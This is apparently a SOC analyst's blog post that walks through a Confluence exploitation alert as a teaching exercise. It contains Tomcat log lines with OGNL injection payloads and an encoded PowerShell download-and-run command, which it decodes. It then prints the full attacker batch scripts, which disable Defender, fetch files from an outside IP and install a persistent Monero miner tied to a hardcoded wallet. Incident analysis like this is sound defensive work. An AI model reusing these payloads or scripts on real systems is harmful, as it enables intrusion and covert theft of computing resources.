Learn to SOC: Cryptominer Analysis

I’m totally in the middle of doing some work but this alert just came in so I have quickly dumped the data:

This came in via a Confluence exploit (not sure which CVE yet). I’ve not got time to analyse but thought I’d share this as an educational excercise for people! It’s a good excercise to see the apache tomcat logs and then decode, obtain samples and analyse the activity/imapct (as well as yoink IOCs etc.)

Apache Tomcat Access Logs

[06/Jun/2022:09:47:03  0100] - http-nio-8090-exec-10 143.198.31.252 GET /${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("whoami").
getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/ HTTP/1.1 302 45ms - - Mozilla/5.0 (Windows 
NT 6.1; WOW64) AppleWebKit/535.1     (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
[06/Jun/2022:09:41:46  0100] - http-nio-8090-exec-7 85.106.117.49 GET /${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new 
java.lang.ProcessBuilder().command('cmd.exe','/k','powershell.exe -exec bypass -enc JAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYg
BDAGwAaQBlAG4AdAA7ACAAJAB0AGUAbQBwAGYAaQBsAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABGAGkAbABlAE4AYQBtAGUAKAApADsAIAAkAHQAZQBtAHAA
ZgBpAGwAZQAgACsAPQAgACcALgBiAGEAdAAnADsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADIAMAAyAC4AMgA4AC4AMgAyADkALgAxADcANAAvAHcAaQBuAC8AawBpAG
wAbAAuAGIAYQB0ACcALAAgACQAdABlAG0AcABmAGkAbABlACkAOwAgACYAIAAkAHQAZQBtAHAAZgBpAGwAZQA=').start()")}/ HTTP/1.1 302 155ms - - Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

So the question here for you is, what CVE is this exploiting?

Warning Risky Code

(Remember to defang all the IPs etc.)

Powershell encoded commands:

JAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAAJAB0AGUAbQBwAGYAaQBsAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABGAGkAbABlAE4AYQBtAGUAKAApADsAIAAkAHQAZQBtAHAAZgBpAGwAZQAgACsAPQAgACcALgBiAGEAdAAnADsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADIAMAAyAC4AMgA4AC4AMgAyADkALgAxADcANAAvAHcAaQBuAC8AawBpAGwAbAAuAGIAYQB0ACcALAAgACQAdABlAG0AcABmAGkAbABlACkAOwAgACYAIAAkAHQAZQBtAHAAZgBpAGwAZQA=

Decoded

$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://202.28.229[.]174/win/kill.bat', $tempfile); & $tempfile

Downloading Samples for analysis

(Remember to defang all the IPs etc.)

We can download samples like this:

wget "http://202.28.229[.]174/win/kill.bat" -UseBasicParsing -UserAgent "LULZ" -OutFile C:\debug\sample004
wget "http://202.28.229[.]174/win/mad.bat" -UseBasicParsing -UserAgent LULZ -OutFile C:\debug\sample005

kill.bat

@echo off

powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"

taskkill /IM logback.exe /f
taskkill /IM network02.exe /f
taskkill /IM ws_TomcatService.exe /f
taskkill /IM explorer.exe /f
del %TEMP%\network02.exe
del %APPDATA%\network02.exe
REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run2" /f
REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run" /f


REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run2" /f
REG DELETE "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run" /f

IF EXIST "%USERPROFILE%\dom" (
    GOTO exist1
) else (
    goto add_it
)

:exist1
tasklist /fi "imagename eq dom.exe" | find ":" >NUL
if not %errorlevel% == 0 (
  echo now is running
  exit /b 1
)
echo [*] Starting dom_miner service
"%USERPROFILE%\dom\dsm.exe" start dom_miner
if errorlevel 0 (
  echo ERROR: Can't start dom_miner service
)
:exist2
tasklist /fi "imagename eq dom.exe" | find ":" >NUL
if not %errorlevel% == 0 (
  echo now is running
  exit /b 1
)

:add_it
echo form exist1
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://202.28.229[.]174/win/mad.bat', $tempfile); & $tempfile ; Remove-Item -Force $tempfile"

This download mad.bat

@echo off

set VERSION=2.5

rem printing greetings

echo MoneroOcean mining setup script v%VERSION%.
echo ^(please report issues to [email protected] email^)
echo.

net session >nul 2>&1
if %errorLevel% == 0 (set ADMIN=1) else (set ADMIN=0)

rem command line arguments
set WALLET=46HmQz11t8uN84P8xgThrQXSYm434VC7hhNR8be4QrGtM1Wa4cDH2GkJ2NNXZ6Dr4bYg6phNjHKYJ1QfpZRBFYW5V6qnRJN
rem this one is optional
set EMAIL=%2
set site=http://202.28.229[.]174/win
rem checking prerequisites

if [%WALLET%] == [] (
  echo Script usage:
  echo ^> setup_dom_miner.bat ^<wallet address^> [^<your email address^>]
  echo ERROR: Please specify your wallet address
  exit /b 1
)

for /f "delims=." %%a in ("%WALLET%") do set WALLET_BASE=%%a
call :strlen "%WALLET_BASE%", WALLET_BASE_LEN
if %WALLET_BASE_LEN% == 106 goto WALLET_LEN_OK
if %WALLET_BASE_LEN% ==  95 goto WALLET_LEN_OK
echo ERROR: Wrong wallet address length (should be 106 or 95): %WALLET_BASE_LEN%
exit /b 1

:WALLET_LEN_OK

if ["%USERPROFILE%"] == [""] (
  echo ERROR: Please define USERPROFILE environment variable to your user directory
  exit /b 1
)

if not exist "%USERPROFILE%" (
  echo ERROR: Please make sure user directory %USERPROFILE% exists
  exit /b 1
)

where powershell >NUL
if not %errorlevel% == 0 (
  echo ERROR: This script requires "powershell" utility to work correctly
  exit /b 1
)

where find >NUL
if not %errorlevel% == 0 (
  echo ERROR: This script requires "find" utility to work correctly
  exit /b 1
)

where findstr >NUL
if not %errorlevel% == 0 (
  echo ERROR: This script requires "findstr" utility to work correctly
  exit /b 1
)

where tasklist >NUL
if not %errorlevel% == 0 (
  echo ERROR: This script requires "tasklist" utility to work correctly
  exit /b 1
)

if %ADMIN% == 1 (
  where sc >NUL
  if not %errorlevel% == 0 (
    echo ERROR: This script requires "sc" utility to work correctly
    exit /b 1
  )
)

rem calculating port

set /a "EXP_MONERO_HASHRATE = %NUMBER_OF_PROCESSORS% * 700 / 1000"

if [%EXP_MONERO_HASHRATE%] == [] ( 
  echo ERROR: Can't compute projected Monero hashrate
  exit 
)

if %EXP_MONERO_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr 4096 ( set PORT=14096 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr  512 ( set PORT=10512 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr  256 ( set PORT=10256 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr  128 ( set PORT=10128 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr   64 ( set PORT=10064 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr   32 ( set PORT=10032 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr   16 ( set PORT=10016 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr    8 ( set PORT=10008 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr    4 ( set PORT=10004 & goto PORT_OK )
if %EXP_MONERO_HASHRATE% gtr    2 ( set PORT=10002 & goto PORT_OK )
set PORT=10001

:PORT_OK

rem printing intentions

set "LOGFILE=%USERPROFILE%\dom\xmrig.log"

echo I will download, setup and run in background Monero CPU miner with logs in %LOGFILE% file.
echo If needed, miner in foreground can be started by %USERPROFILE%\dom\miner.bat script.
echo Mining will happen to %WALLET% wallet.

if not [%EMAIL%] == [] (
  echo ^(and %EMAIL% email as password to modify wallet options later at https://moneroocean.stream site^)
)

echo.

if %ADMIN% == 0 (
  echo Since I do not have admin access, mining in background will be started using your startup directory script and only work when your are logged in this host.
) else (
  echo Mining in background will be performed using dom_miner service.
)

echo.
echo JFYI: This host has %NUMBER_OF_PROCESSORS% CPU threads, so projected Monero hashrate is around %EXP_MONERO_HASHRATE% KH/s.
echo.


rem start doing stuff: preparing miner

echo [*] Removing previous moneroocean miner (if any)
sc stop dom_miner
sc delete dom_miner
taskkill /f /t /im dom.exe

:REMOVE_DIR0
echo [*] Removing "%USERPROFILE%\dom" directory
timeout 5
rmdir /q /s "%USERPROFILE%\dom" >NUL 2>NUL
IF EXIST "%USERPROFILE%\dom" GOTO REMOVE_DIR0

echo [*] Downloading MoneroOcean advanced version of xmrig to "%USERPROFILE%\dom.zip"
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('%site%/dom.zip', '%USERPROFILE%\dom.zip')"
if errorlevel 1 (
  echo ERROR: Can't download MoneroOcean advanced version of xmrig
  goto MINER_BAD
)

echo [*] Unpacking "%USERPROFILE%\dom.zip" to "%USERPROFILE%\dom"
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('%USERPROFILE%\dom.zip', '%USERPROFILE%\dom')"
if errorlevel 1 (
  echo [*] Downloading 7za.exe to "%USERPROFILE%\7za.exe"
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('%site%/7za.exe', '%USERPROFILE%\7za.exe')"
  if errorlevel 1 (
    echo ERROR: Can't download 7za.exe to "%USERPROFILE%\7za.exe"
    exit /b 1
  )
  echo [*] Unpacking stock "%USERPROFILE%\dom.zip" to "%USERPROFILE%\dom"
  "%USERPROFILE%\7za.exe" x -y -o"%USERPROFILE%\dom" "%USERPROFILE%\dom.zip" >NUL
  del "%USERPROFILE%\7za.exe"
)
del "%USERPROFILE%\dom.zip"

echo [*] Checking if advanced version of "%USERPROFILE%\dom\dom.exe" works fine ^(and not removed by antivirus software^)
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
"%USERPROFILE%\dom\dom.exe" --help >NUL
if %ERRORLEVEL% equ 0 goto MINER_OK
:MINER_BAD

if exist "%USERPROFILE%\dom\dom.exe" (
  echo WARNING: Advanced version of "%USERPROFILE%\dom\dom.exe" is not functional
) else (
  echo WARNING: Advanced version of "%USERPROFILE%\dom\dom.exe" was removed by antivirus
)

echo [*] Looking for the latest version of Monero miner
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('%site%/dom-6.zip', '%USERPROFILE%\dom.zip')"
if errorlevel 1 (
  echo ERROR: Can't download "%MINER_LOCATION%" to "%USERPROFILE%\dom.zip"
  exit /b 1
)

:REMOVE_DIR1
echo [*] Removing "%USERPROFILE%\dom" directory
timeout 5
rmdir /q /s "%USERPROFILE%\dom" >NUL 2>NUL
IF EXIST "%USERPROFILE%\dom" GOTO REMOVE_DIR1

echo [*] Unpacking "%USERPROFILE%\dom.zip" to "%USERPROFILE%\dom"
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('%USERPROFILE%\dom.zip', '%USERPROFILE%\dom')"
if errorlevel 1 (
  echo [*] Downloading 7za.exe to "%USERPROFILE%\7za.exe"
  powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('%site%/7za.exe', '%USERPROFILE%\7za.exe')"
  if errorlevel 1 (
    echo ERROR: Can't download 7za.exe to "%USERPROFILE%\7za.exe"
    exit /b 1
  )
  echo [*] Unpacking advanced "%USERPROFILE%\dom.zip" to "%USERPROFILE%\dom"
  "%USERPROFILE%\7za.exe" x -y -o"%USERPROFILE%\dom" "%USERPROFILE%\dom.zip" >NUL
  if errorlevel 1 (
    echo ERROR: Can't unpack "%USERPROFILE%\dom.zip" to "%USERPROFILE%\dom"
    exit /b 1
  )
  del "%USERPROFILE%\7za.exe"
)
del "%USERPROFILE%\dom.zip"

echo [*] Checking if stock version of "%USERPROFILE%\dom\dom.exe" works fine ^(and not removed by antivirus software^)
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 0,'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
"%USERPROFILE%\dom\dom.exe" --help >NUL
if %ERRORLEVEL% equ 0 goto MINER_OK

if exist "%USERPROFILE%\dom\dom.exe" (
  echo WARNING: Stock version of "%USERPROFILE%\dom\dom.exe" is not functional
) else (
  echo WARNING: Stock version of "%USERPROFILE%\dom\dom.exe" was removed by antivirus
)

exit /b 1

:MINER_OK

echo [*] Miner "%USERPROFILE%\dom\dom.exe" is OK

for /f "tokens=*" %%a in ('powershell -Command "hostname | %%{$_ -replace '[^a-zA-Z0-9]+', '_'}"') do set PASS=dom.%%a
if [%PASS%] == [] (
  set PASS=na
)
if not [%EMAIL%] == [] (
  set "PASS=%PASS%:%EMAIL%"
)

powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:%PORT%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"user\": *\".*\",', '\"user\": \"%WALLET%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"%PASS%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 
set LOGFILE2=%LOGFILE:\=\\%
powershell -Command "$out = cat '%USERPROFILE%\dom\config.json' | %%{$_ -replace '\"log-file\": *null,', '\"log-file\": \"%LOGFILE2%\",'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config.json'" 

copy /Y "%USERPROFILE%\dom\config.json" "%USERPROFILE%\dom\config_background.json" >NUL
powershell -Command "$out = cat '%USERPROFILE%\dom\config_background.json' | %%{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\dom\config_background.json'" 

rem preparing script
(
echo @echo off
echo tasklist /fi "imagename eq dom.exe" ^| find ":" ^>NUL
echo if errorlevel 1 goto ALREADY_RUNNING
echo start /low %%~dp0dom.exe %%^*
echo goto EXIT
echo :ALREADY_RUNNING
echo echo Monero miner is already running in the background. Refusing to run another one.
echo echo Run "taskkill /IM dom.exe" if you want to remove background miner first.
echo :EXIT
) > "%USERPROFILE%\dom\miner.bat"

rem preparing script background work and work under reboot

if %ADMIN% == 1 goto ADMIN_MINER_SETUP

if exist "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" (
  set "STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
  goto STARTUP_DIR_OK
)
if exist "%USERPROFILE%\Start Menu\Programs\Startup" (
  set "STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup"
  goto STARTUP_DIR_OK  
)

echo ERROR: Can't find Windows startup directory
exit /b 1

:STARTUP_DIR_OK
echo [*] Adding call to "%USERPROFILE%\dom\miner.bat" script to "%STARTUP_DIR%\dom_miner.bat" script
(
echo @echo off
echo "%USERPROFILE%\dom\miner.bat" --config="%USERPROFILE%\dom\config_background.json"
) > "%STARTUP_DIR%\dom_miner.bat"

echo [*] Running miner in the background
call "%STARTUP_DIR%\dom_miner.bat"
goto OK

:ADMIN_MINER_SETUP


echo [*] Creating dom_miner service
sc stop dom_miner
sc delete dom_miner
"%USERPROFILE%\dom\dsm.exe" install dom_miner "%USERPROFILE%\dom\dom.exe"
if errorlevel 1 (
  echo ERROR: Can't create dom_miner service
  exit /b 1
)
"%USERPROFILE%\dom\dsm.exe" set dom_miner AppDirectory "%USERPROFILE%\dom"
"%USERPROFILE%\dom\dsm.exe" set dom_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
"%USERPROFILE%\dom\dsm.exe" set dom_miner AppStdout "%USERPROFILE%\dom\stdout"
"%USERPROFILE%\dom\dsm.exe" set dom_miner AppStderr "%USERPROFILE%\dom\stderr"

echo [*] Starting dom_miner service
"%USERPROFILE%\dom\dsm.exe" start dom_miner
if errorlevel 1 (
  echo ERROR: Can't start dom_miner service
  exit /b 1
)

echo
echo Please reboot system if dom_miner service is not activated yet (if "%USERPROFILE%\dom\xmrig.log" file is empty)
goto OK

:OK
echo
echo [*] Setup complete
exit /b 0

:strlen string len
setlocal EnableDelayedExpansion
set "token=#%~1" & set "len=0"
for /L %%A in (12,-1,0) do (
  set/A "len|=1<<%%A"
  for %%B in (!len!) do if "!token:~%%B,1!"=="" set/A "len&=~1<<%%A"
)
endlocal & set %~2=%len%
exit /b

More to follow (hopefully 😉 )

Installing Nessus Pro on Kali Linux

Testing Risky Egress Ports

Apache Tomcat Access Logs

Warning Risky Code

Downloading Samples for analysis

Related articles